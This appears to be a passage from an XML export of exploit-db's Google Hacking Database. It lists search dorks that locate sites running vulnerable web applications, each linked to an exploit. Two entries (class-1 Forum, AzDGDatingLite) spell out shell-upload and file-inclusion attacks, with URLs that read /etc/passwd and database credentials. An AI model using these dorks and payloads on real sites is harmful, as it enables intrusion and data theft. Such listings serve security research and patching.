<query>&quot;Powered by : elkagroup.com&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+:+elkagroup.com%22</querystring>
<edb>https://www.exploit-db.com/exploits/10836</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1560</id>
<link>https://www.exploit-db.com/ghdb/1560</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By : Yamamah Version 1.00&quot;</shortDescription>
<textualDescription>Yamamah Photo Gallery 1.00 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13857</textualDescription>
<query>&quot;Powered By : Yamamah Version 1.00&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+:+Yamamah+Version+1.00%22</querystring>
<edb>https://www.exploit-db.com/exploits/13857</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1823</id>
<link>https://www.exploit-db.com/ghdb/1823</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By : Yamamah Version 1.00&quot;</shortDescription>
<textualDescription>Yamamah Photo Gallery 1.00 (download.php) Local File Disclosure Vulnerability - CVE: 2010-2334: https://www.exploit-db.com/exploits/13856</textualDescription>
<query>&quot;Powered By : Yamamah Version 1.00&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+:+Yamamah+Version+1.00%22</querystring>
<edb>https://www.exploit-db.com/exploits/13856</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>546</id>
<link>https://www.exploit-db.com/ghdb/546</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by A-CART&quot;</shortDescription>
<textualDescription>A-CART is an ASP shopping cart application written in VBScript. It is comprised of a number of ASP scripts and an Access database. A security vulnerability in the product allows remote attackers to download the product's database, thus gain access to sensitive information about users of the product (name, surname, address, e-mail, credit card number, and user's login-password). http://www.securityfocus.com/bid/5597 (search SF for more)</textualDescription>
<query>&quot;Powered by A-CART&quot;</query>
<querystring>https://www.google.com/search?hl=es&amp;q=%22Powered+by+A-CART%22+</querystring>
<edb></edb>
<date>2004-10-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>1628</id>
<link>https://www.exploit-db.com/ghdb/1628</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By Aardvark Topsites PHP 4.2.2&quot;</shortDescription>
<textualDescription>Aardvark Topsites PHP 4.2.2 (path) Remote File Inclusion Vuln - CVE: 2006-7026: https://www.exploit-db.com/exploits/1730</textualDescription>
<query>&quot;Powered By Aardvark Topsites PHP 4.2.2&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+Aardvark+Topsites+PHP+4.2.2%22</querystring>
<edb>https://www.exploit-db.com/exploits/1730</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2684</id>
<link>https://www.exploit-db.com/ghdb/2684</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Absolute File Send&quot;</shortDescription>
<textualDescription>Absolute File Send 1.0 Remote Cookie Handling Vulnerability: https://www.exploit-db.com/exploits/6881</textualDescription>
<query>&quot;Powered by Absolute File Send&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Absolute+File+Send%22</querystring>
<edb>https://www.exploit-db.com/exploits/6881</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2796</id>
<link>https://www.exploit-db.com/ghdb/2796</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Absolute Podcast&quot;</shortDescription>
<textualDescription>Absolute Podcast 1.0 Remote Insecure Cookie Handling Vulnerability - CVE: 2008-6857: https://www.exploit-db.com/exploits/6882</textualDescription>
<query>&quot;Powered by Absolute Podcast&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Absolute+Podcast%22</querystring>
<edb>https://www.exploit-db.com/exploits/6882</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2265</id>
<link>https://www.exploit-db.com/ghdb/2265</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Active PHP Bookmarks v1.3&quot; inurl:.view_group.php?id=</shortDescription>
<textualDescription>Active PHP Bookmarks v1.3 SQL Injection Vulnerability - CVE: 2008-3748: https://www.exploit-db.com/exploits/10597</textualDescription>
<query>&quot;Powered by Active PHP Bookmarks v1.3&quot; inurl:.view_group.php?id=</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22Powered+by+Active+PHP+Bookmarks+v1.3%22+inurl:.view_group.php%3Fid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/10597</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1337</id>
<link>https://www.exploit-db.com/ghdb/1337</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by active php bookmarks&quot; | inurl:bookmarks/view_group.php?id=</shortDescription>
<textualDescription>Active PHP Bookmarks, a web based bookmark manager, was originally developed by Brandon Stone. Due to lack of time he has withdrawn himself from the project, however keeping his development forum on-line. On December 3rd 2004 this APB-forum, which was still the home of a small but relatively active community, was compromised. All content of the forum was lost, including links to important user contributed patches for the APB code.exploit (i haven't tested it)http://www.securityfocus.com/archive/1/305392my version of exploithttp://fr0zen.no-ip.org/apbn-0.2.5_remote_incl_xpl.phps</textualDescription>
<query>&quot;powered by active php bookmarks&quot; | inurl:bookmarks/view_group.php?id=</query>
<querystring>https://www.google.com/search?q=%22powered+by+active+php+bookmarks%22+%7C+inurl%3Abookmarks%2Fview_group.php%3Fid%3D&amp;btnG=H%C4%BEada%C5%A5+v+Google&amp;meta=&amp;num=100</querystring>
<edb></edb>
<date>2006-04-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>2672</id>
<link>https://www.exploit-db.com/ghdb/2672</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by aflog&quot;</shortDescription>
<textualDescription>aflog 1.01 Multiple Insecure Cookie Handling Vulnerabilies - CVE: 2008-4784: https://www.exploit-db.com/exploits/6818</textualDescription>
<query>&quot;powered by aflog&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+aflog%22</querystring>
<edb>https://www.exploit-db.com/exploits/6818</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>529</id>
<link>https://www.exploit-db.com/ghdb/529</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by AJ-Fork v.167&quot;</shortDescription>
<textualDescription>AJ-Fork is, as the name implies - a fork. Based on the CuteNews 1.3.1 core, the aim of the project is to improve what can be improved, and extend what can be extended without adding too much bloat (in fierce opposition to the mainstream blogging/light publishing tools of today). The project aims to be backwards-compatible with CuteNews in what areas are sensible. It is vulnerable for a full path disclosure. http://www.securityfocus.com/bid/11301</textualDescription>
<query>&quot;Powered by AJ-Fork v.167&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+AJ-Fork+v.167%22+%0D%0A</querystring>
<edb></edb>
<date>2004-10-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>1852</id>
<link>https://www.exploit-db.com/ghdb/1852</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Ajax Portal 3.0&quot;</shortDescription>
<textualDescription>MyioSoft Ajax Portal 3.0 (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5653: https://www.exploit-db.com/exploits/7044</textualDescription>
<query>&quot;Powered by Ajax Portal 3.0&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Ajax+Portal+3.0%22</querystring>
<edb>https://www.exploit-db.com/exploits/7044</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3260</id>
<link>https://www.exploit-db.com/ghdb/3260</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by Albinator&quot;</shortDescription>
<textualDescription>Albinator 2.0.6 (Config_rootdir) Remote File Inclusion - CVE: 2006-2182: https://www.exploit-db.com/exploits/1744</textualDescription>
<query>&quot;powered by Albinator&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+Albinator%22</querystring>
<edb>https://www.exploit-db.com/exploits/1744</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3665</id>
<link>https://www.exploit-db.com/ghdb/3665</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;POWERED BY ALITALK&quot;</shortDescription>
<textualDescription>intext:&quot;POWERED BY ALITALK&quot;</textualDescription>
<query>&quot;POWERED BY ALITALK&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22POWERED%20BY%20ALITALK%22</querystring>
<edb></edb>
<date>2011-01-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>2246</id>
<link>https://www.exploit-db.com/ghdb/2246</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by AllMyGuests&quot;</shortDescription>
<textualDescription>AllMyGuests 0.4.1 (AMG_id) Remote SQL Injection Vulnerability - CVE: 2008-1961: https://www.exploit-db.com/exploits/5469</textualDescription>
<query>&quot;powered by AllMyGuests&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22powered+by+AllMyGuests%22</querystring>
<edb>https://www.exploit-db.com/exploits/5469</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2710</id>
<link>https://www.exploit-db.com/ghdb/2710</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By AlstraSoft AskMe Pro&quot;</shortDescription>
<textualDescription>AlstraSoft AskMe Pro 2.1 Multiple SQL Injection Vulnerabilities - CVE: 2008-2902: https://www.exploit-db.com/exploits/5821</textualDescription>
<query>&quot;Powered By AlstraSoft AskMe Pro&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+AlstraSoft+AskMe+Pro%22</querystring>
<edb>https://www.exploit-db.com/exploits/5821</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2661</id>
<link>https://www.exploit-db.com/ghdb/2661</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by AlstraSoft SendIt Pro&quot;</shortDescription>
<textualDescription>AlstraSoft SendIt Pro Remote File Upload Vulnerability - CVE: 2008-6932: https://www.exploit-db.com/exploits/7101</textualDescription>
<query>&quot;Powered by AlstraSoft SendIt Pro&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+AlstraSoft+SendIt+Pro%22</querystring>
<edb>https://www.exploit-db.com/exploits/7101</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3093</id>
<link>https://www.exploit-db.com/ghdb/3093</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by AMCMS3&quot;</shortDescription>
<textualDescription>Arcadem 2.01 Remote SQL Injection / RFI Vulnerabilties: https://www.exploit-db.com/exploits/4326</textualDescription>
<query>&quot;Powered by AMCMS3&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+AMCMS3%22</querystring>
<edb>https://www.exploit-db.com/exploits/4326</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3145</id>
<link>https://www.exploit-db.com/ghdb/3145</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by AMCMS3&quot;</shortDescription>
<textualDescription>Agares PhpAutoVideo 2.21 (articlecat) Remote SQL Injection - CVE: 2008-0262: https://www.exploit-db.com/exploits/4905</textualDescription>
<query>&quot;powered by AMCMS3&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+AMCMS3%22</querystring>
<edb>https://www.exploit-db.com/exploits/4905</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1095</id>
<link>https://www.exploit-db.com/ghdb/1095</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by and copyright class-1&quot; 0.24.4</shortDescription>
<textualDescription>class-1 Forum Software v 0.24.4 Remote code executionsoftware: site: http://www.class1web.co.uk/softwaredescription: class-1 Forum Software is a PHP/MySQL driven web forum. It is written and distributedunder the GNU General Public License which means that its source is freely-distributedand available to the general public. vulnerability: the way the forum checks attachment extensions...look at the vulnerable code at viewforum.php 256-272 lines.nothing seems so strange, but... what happen if you try to upload a filewith this name? :shell.php.' or 'a' ='a;)[1] SQL INJECTION!The query and other queries like this become:SELECT * FROM [extensions table name] WHERE extension='' or 'a' ='a' AND file_type='Image'you have bypassed the check... now an executable file is uploaded, because for Apache, bothon Windows and Linux a file with that name is an executable php file...you can download a poc file from my site, at url:http://rgod.altervista.org/shell.zipinside we have:you can do test manually, unzip the file, register, login, post this file as attachment, thengo to this url to see the directory where the attachment has been uploaded:http://[target]/[path]/viewattach.phpyou will be redirected to:http://[target]/[path]/[upload_dir]/then launch commands:http://[target]/[path]/[upload_dir]/shell.php.'%20or%20'a'%20='a?command=cat%20/etc/passwdto see /etc/passwd filehttp://[target]/[path]/[upload_dir]/shell.php.'%20or%20'a'%20='a?command=cat%20./../db_config.incto see database username and passwordand so on...you can see my poc exploit at this url:http://www.rgod.altervista.org/class1.htmlgoogledork: &quot;Powered by and copyright class-1&quot;rgodsite: http://rgod.altervista.orgmail: retrogod [at] aliceposta . it</textualDescription>
<query>&quot;Powered by and copyright class-1&quot; 0.24.4</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=%22Powered+by+and+copyright+class-1%22++0.24.4&amp;num=50</querystring>
<edb></edb>
<date>2005-09-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>407</id>
<link>https://www.exploit-db.com/ghdb/407</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by antiboard&quot;</shortDescription>
<textualDescription>&quot;AntiBoard is a small and compact multi-threaded bulletin board/message board system written in PHP. It uses either MySQL or PostgreSQL as the database backend, and has support for different languages. It is not meant as the end all be all of bulletin boards, but rather something to easily integrate into your own page.&quot;There is an excellent vulnerability report at:http://www.securiteam.com/unixfocus/5XP010ADPY.htmlVendor Status:The vendor has been informed of the issues on the 28th July 2004, however no fix is planned in the near future.</textualDescription>
<query>&quot;powered by antiboard&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22powered+by+antiboard%22</querystring>
<edb></edb>
<date>2004-08-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>3309</id>
<link>https://www.exploit-db.com/ghdb/3309</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By Aqua Cms&quot;</shortDescription>
<textualDescription>Aqua CMS (username) SQL Injection Vulnerability - CVE: 2009-1317: https://www.exploit-db.com/exploits/8432</textualDescription>
<query>&quot;Powered By Aqua Cms&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+Aqua+Cms%22</querystring>
<edb>https://www.exploit-db.com/exploits/8432</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2054</id>
<link>https://www.exploit-db.com/ghdb/2054</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Atomic Photo Album&quot; inurl:&quot;photo.php?apa_album_ID=&quot;</shortDescription>
<textualDescription>Atomic Photo Album 1.0.2 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/14801</textualDescription>
<query>&quot;Powered by Atomic Photo Album&quot; inurl:&quot;photo.php?apa_album_ID=&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Atomic+Photo+Album%22+inurl:%22photo.php%3Fapa_album_ID%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/14801</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1140</id>
<link>https://www.exploit-db.com/ghdb/1140</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by autolinks pro 2.1&quot; inurl:register.php</shortDescription>
<textualDescription>AutoLinksPro is a linking solution. AutoLinksPro link exchange software was built for the search engines to help improve your search engine rankings, traffic, and sales.Remote PHP File Include Vulnerabilityhttp://www.securityfocus.com/archive/1/409529/30/120/threaded</textualDescription>
<query>&quot;Powered by autolinks pro 2.1&quot; inurl:register.php</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22Powered+by+autolinks+pro+2.1%22+inurl%3Aregister.php</querystring>
<edb></edb>
<date>2005-09-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>1767</id>
<link>https://www.exploit-db.com/ghdb/1767</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By AV Arcade&quot;</shortDescription>
<textualDescription>AV Arcade 2.1b (index.php id) Remote SQL Injection Vulnerability - CVE: 2007-3563: https://www.exploit-db.com/exploits/4138</textualDescription>
<query>&quot;Powered By AV Arcade&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+AV+Arcade%22</querystring>
<edb>https://www.exploit-db.com/exploits/4138</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2427</id>
<link>https://www.exploit-db.com/ghdb/2427</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By Azadi Network&quot;</shortDescription>
<textualDescription>Azadi Network (page) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10830</textualDescription>
<query>&quot;Powered By Azadi Network&quot;</query>
<querystring>https://www.google.com/search?q=+%22Powered+By+Azadi+Network%22</querystring>
<edb>https://www.exploit-db.com/exploits/10830</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1101</id>
<link>https://www.exploit-db.com/ghdb/1101</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by AzDg&quot; (2.1.3 | 2.1.2 | 2.1.1)</shortDescription>
<textualDescription>AzDGDatingLite V 2.1.3 (possibly prior versions) remote code execution software: site: http://www.azdg.com/ download page: http://www.azdg.com/scripts.php?l=english description:&quot; AzDGDatingLite is a Free dating script working on PHP and MySQL. Multilanguage, Multitemplate, quick/simple search, feedback with webmaster, Admin maillist, Very customizable &quot; etc. vulnerability: look at the vulnerable code in ./include/security.inc.php at lines ~80-90 ... else { if (isset($l) &amp;&amp; file_exists(C_PATH.'/languages/'.$l.'/'.$l.'.php') &amp;&amp; $l != '') { include_once C_PATH.'/languages/'.$l.'/'.$l.'.php'; include_once C_PATH.'/languages/'.$l.'/'.$l.'_.php'; } ... you can include arbitrary file on the server using &quot;../&quot; and null byte (%00) (to truncate path to the filename you choose), example: http://[target]/[path]/azdg//include/security.inc.php?l=../../../../../../../[filename.ext]%00 at the begin of the script we have: @ob_start(); look at the php ob_ start man page : &quot;This function will turn output buffering on. While output buffering is active no output is sent from the script (other than headers), instead the output is stored in an internal buffer.&quot; However, this is not a secure way to protect a script: buffer is never showned, so you cannot see arbitrary file from the target machine this time ... but you can execute arbirtrary commands and after to see any file :) : when you register to azdg you can upload photos, so you can upload and include a gif or jpeg file like this: usually photos are uploaded to ./members/uploads/[subdir]/[newfilename].[ext] azdg calculates [subdir] &amp; [newfilename] using date(), time() and rand() functions you cannot calculate but you can retrieve the filename from azdg pages when file is showned on screen (!), so you can do this: http://[target]/[path]/azdg//include/security.inc.php?l=../../../members/uploads/[subdir]/[filename.ext]%00&amp;cmd=cat%20/etc/passwd the output will be redirected to ./include/temp.txt so you make a GET request of this file and you have /etc/passwd file you can find my poc exploit at this url:http://rgod.altervista.org/azdg.html</textualDescription>
<query>&quot;Powered by AzDg&quot; (2.1.3 | 2.1.2 | 2.1.1)</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=%22Powered+by+AzDg%22+%282.1.3+%7C+2.1.2+%7C+2.1.1%29</querystring>
<edb></edb>
<date>2005-09-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>3092</id>
<link>https://www.exploit-db.com/ghdb/3092</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By Basic CMS SweetRice&quot;</shortDescription>
<textualDescription>SweetRice 0.6.4 (fckeditor) Remote File Upload: https://www.exploit-db.com/exploits/14184</textualDescription>
<query>&quot;Powered By Basic CMS SweetRice&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+Basic+CMS+SweetRice%22</querystring>
<edb>https://www.exploit-db.com/exploits/14184</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2558</id>
<link>https://www.exploit-db.com/ghdb/2558</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Battle Blog&quot;</shortDescription>
<textualDescription>Battle Blog 1.25 (comment.asp) Remote SQL Injection Vulnerability - CVE: 2008-2626: https://www.exploit-db.com/exploits/5731</textualDescription>
<query>&quot;Powered by Battle Blog&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Battle+Blog%22</querystring>
<edb>https://www.exploit-db.com/exploits/5731</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1830</id>
<link>https://www.exploit-db.com/ghdb/1830</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by beamospetition 1.0.12&quot;</shortDescription>
<textualDescription>Joomla Component beamospetition 1.0.12 SQL Injection / XSS - CVE: 2009-0378: https://www.exploit-db.com/exploits/7847</textualDescription>
<query>&quot;Powered by beamospetition 1.0.12&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+beamospetition+1.0.12%22</querystring>
<edb>https://www.exploit-db.com/exploits/7847</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6805</id>
<link>https://www.exploit-db.com/ghdb/6805</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By Best Support System&quot;</shortDescription>
<textualDescription># Google Dork: &quot;Powered By Best Support System&quot;
# Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated).
# CVE: CVE-2020-24963. https://www.exploit-db.com/exploits/49122
# Date: 23/2/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;Powered By Best Support System&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered By Best Support System&quot;</querystring>
<edb></edb>
<date>2021-02-23</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3147</id>
<link>https://www.exploit-db.com/ghdb/3147</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by BIGACE 2.4&quot;</shortDescription>
<textualDescription>BIGACE 2.4 Multiple Remote File Inclusion Vulnerabilities - CVE: 2008-2520: https://www.exploit-db.com/exploits/5596</textualDescription>
<query>&quot;Powered by BIGACE 2.4&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+BIGACE+2.4%22</querystring>
<edb>https://www.exploit-db.com/exploits/5596</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3571</id>
<link>https://www.exploit-db.com/ghdb/3571</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by BIGACE 2.5&quot;</shortDescription>
<textualDescription>BIGACE CMS 2.5 (username) Remote SQL Injection - CVE: 2009-1778:
https://www.exploit-db.com/exploits/8664</textualDescription>
<query>&quot;Powered by BIGACE 2.5&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+BIGACE%202.5%22</querystring>
<edb>https://www.exploit-db.com/exploits/8664</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3600</id>
<link>https://www.exploit-db.com/ghdb/3600</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by bitweaver&quot;</shortDescription>
<textualDescription>bitweaver 1.3 (tmpImagePath) Attachment mod_mime Exploit - CVE: 2006-3105: https://www.exploit-db.com/exploits/1918</textualDescription>
<query>&quot;powered by bitweaver&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+bitweaver%22</querystring>
<edb>https://www.exploit-db.com/exploits/1918</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1791</id>
<link>https://www.exploit-db.com/ghdb/1791</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by Blog System&quot;</shortDescription>
<textualDescription>Blog System 1.x (note) SQL Injection Vuln - CVE: 2010-0458: https://www.exploit-db.com/exploits/11216</textualDescription>
<query>&quot;powered by Blog System&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+Blog+System%22</querystring>
<edb>https://www.exploit-db.com/exploits/11216</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3495</id>
<link>https://www.exploit-db.com/ghdb/3495</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by BLOG:CMS&quot;|&quot;Powered by blogcms.com&quot;|&quot;2003-2004, Radek Hulán&quot;</shortDescription>
<textualDescription>BLOG:CMS 4.0.0k Remote SQL Injection - CVE: 2006-3364: https://www.exploit-db.com/exploits/1960</textualDescription>
<query>&quot;Powered by BLOG:CMS&quot;|&quot;Powered by blogcms.com&quot;|&quot;2003-2004, Radek Hulán&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+BLOG:CMS%22|%22Powered+by+blogcms.com%22|%222003-2004,+Radek+Hul%C3%A1n%22</querystring>
<edb>https://www.exploit-db.com/exploits/1960</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2380</id>
<link>https://www.exploit-db.com/ghdb/2380</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by Blue Dove Web Design&quot;</shortDescription>
<textualDescription>Blue Dove Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11360</textualDescription>
<query>&quot;powered by Blue Dove Web Design&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+Blue+Dove+Web+Design%22</querystring>
<edb>https://www.exploit-db.com/exploits/11360</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3504</id>
<link>https://www.exploit-db.com/ghdb/3504</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by blur6ex&quot;</shortDescription>
<textualDescription>blur6ex 0.3.462 (ID) Admin Disclosure / Blind SQL Injection - CVE: 2006-3065: https://www.exploit-db.com/exploits/1904</textualDescription>
<query>&quot;powered by blur6ex&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+blur6ex%22</querystring>
<edb>https://www.exploit-db.com/exploits/1904</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1694</id>
<link>https://www.exploit-db.com/ghdb/1694</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by BosClassifieds Classified Ads System&quot;</shortDescription>
<textualDescription>BosClassifieds 3.0 (index.php cat) SQL Injection Vulnerability - CVE: 2008-1838: https://www.exploit-db.com/exploits/5444</textualDescription>
<query>&quot;Powered by BosClassifieds Classified Ads System&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+BosClassifieds+Classified+Ads+System%22</querystring>
<edb>https://www.exploit-db.com/exploits/5444</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3277</id>
<link>https://www.exploit-db.com/ghdb/3277</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by bp blog 6.0&quot;</shortDescription>
<textualDescription>BP Blog 6.0 (id) Remote Blind SQL Injection Vulnerability - CVE: 2008-2554: https://www.exploit-db.com/exploits/5705</textualDescription>
<query>&quot;Powered by bp blog 6.0&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+bp+blog+6.0%22</querystring>
<edb>https://www.exploit-db.com/exploits/5705</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2787</id>
<link>https://www.exploit-db.com/ghdb/2787</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by bSpeak 1.10&quot;</shortDescription>
<textualDescription>bSpeak 1.10 (forumid) Remote Blind SQL Injection Vulnerability - CVE: 2009-1747: https://www.exploit-db.com/exploits/8751</textualDescription>
<query>&quot;Powered by bSpeak 1.10&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+bSpeak+1.10%22</querystring>
<edb>https://www.exploit-db.com/exploits/8751</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3501</id>
<link>https://www.exploit-db.com/ghdb/3501</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Burning Board Lite 1.0.2 * 2001-2004&quot;</shortDescription>
<textualDescription>Woltlab Burning Board Lite 1.0.2 Blind SQL Injection: https://www.exploit-db.com/exploits/2842</textualDescription>
<query>&quot;Powered by Burning Board Lite 1.0.2 * 2001-2004&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Burning+Board+Lite+1.0.2+*+2001-2004%22</querystring>
<edb>https://www.exploit-db.com/exploits/2842</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3508</id>
<link>https://www.exploit-db.com/ghdb/3508</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Burning Board Lite 1.0.2 * 2001-2004&quot;</shortDescription>
<textualDescription>Woltlab Burning Board Lite 1.0.2 decode_cookie() SQL Injection - CVE: 2006-6237: https://www.exploit-db.com/exploits/2841</textualDescription>
<query>&quot;Powered by Burning Board Lite 1.0.2 * 2001-2004&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Burning+Board+Lite+1.0.2+*+2001-2004%22</querystring>
<edb>https://www.exploit-db.com/exploits/2841</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3406</id>
<link>https://www.exploit-db.com/ghdb/3406</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Burning Board Lite 1.0.2&quot; or &quot;Powered by Burning Board 2.3.6&quot;</shortDescription>
